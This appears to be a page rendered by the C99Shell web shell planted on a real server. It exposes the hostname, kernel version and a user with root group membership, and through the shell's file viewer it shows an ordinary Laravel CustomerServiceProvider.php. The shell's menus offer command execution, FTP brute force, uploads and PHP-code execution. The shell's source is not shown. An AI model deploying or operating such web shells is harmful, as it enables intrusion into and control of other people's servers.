!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/Modules/Customer/Providers/   drwxr-xr-x
Free 28.26 GB of 117.98 GB (23.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CustomerServiceProvider.php (2.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Modules\Customer\Providers;

use 
Illuminate\Support\ServiceProvider;

class 
CustomerServiceProvider extends ServiceProvider
{
    
/**
     * @var string
     */
    
protected $moduleName 'Customer';

    
/**
     * @var string
     */
    
protected $moduleNameLower 'customer';

    
/**
     * Boot the application events.
     *
     * @return void
     */
    
public function boot()
    {
        
$this->registerTranslations();
        
$this->registerConfig();
        
$this->registerViews();
        
$this->loadMigrationsFrom(module_path($this->moduleName'Database/Migrations'));
    }

    
/**
     * Register the service provider.
     *
     * @return void
     */
    
public function register()
    {
        
$this->app->register(RouteServiceProvider::class);
    }

    
/**
     * Register config.
     *
     * @return void
     */
    
protected function registerConfig()
    {
        
$this->publishes([
            
module_path($this->moduleName'Config/config.php') => config_path($this->moduleNameLower.'.php'),
        ], 
'config');
        
$this->mergeConfigFrom(
            
module_path($this->moduleName'Config/config.php'), $this->moduleNameLower
        
);
    }

    
/**
     * Register views.
     *
     * @return void
     */
    
public function registerViews()
    {
        
$viewPath resource_path('views/modules/'.$this->moduleNameLower);

        
$sourcePath module_path($this->moduleName'Resources/views');

        
$this->publishes([
            
$sourcePath => $viewPath,
        ], [
'views'$this->moduleNameLower.'-module-views']);

        
$this->loadViewsFrom(array_merge($this->getPublishableViewPaths(), [$sourcePath]), $this->moduleNameLower);
    }

    
/**
     * Register translations.
     *
     * @return void
     */
    
public function registerTranslations()
    {
        
$langPath resource_path('lang/modules/'.$this->moduleNameLower);

        if (
is_dir($langPath)) {
            
$this->loadTranslationsFrom($langPath$this->moduleNameLower);
        } else {
            
$this->loadTranslationsFrom(module_path($this->moduleName'Resources/lang'), $this->moduleNameLower);
        }
    }

    
/**
     * Get the services provided by the provider.
     *
     * @return array
     */
    
public function provides()
    {
        return [];
    }

    private function 
getPublishableViewPaths(): array
    {
        
$paths = [];
        foreach (
\Config::get('view.paths') as $path) {
            if (
is_dir($path.'/modules/'.$this->moduleNameLower)) {
                
$paths[] = $path.'/modules/'.$this->moduleNameLower;
            }
        }

        return 
$paths;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--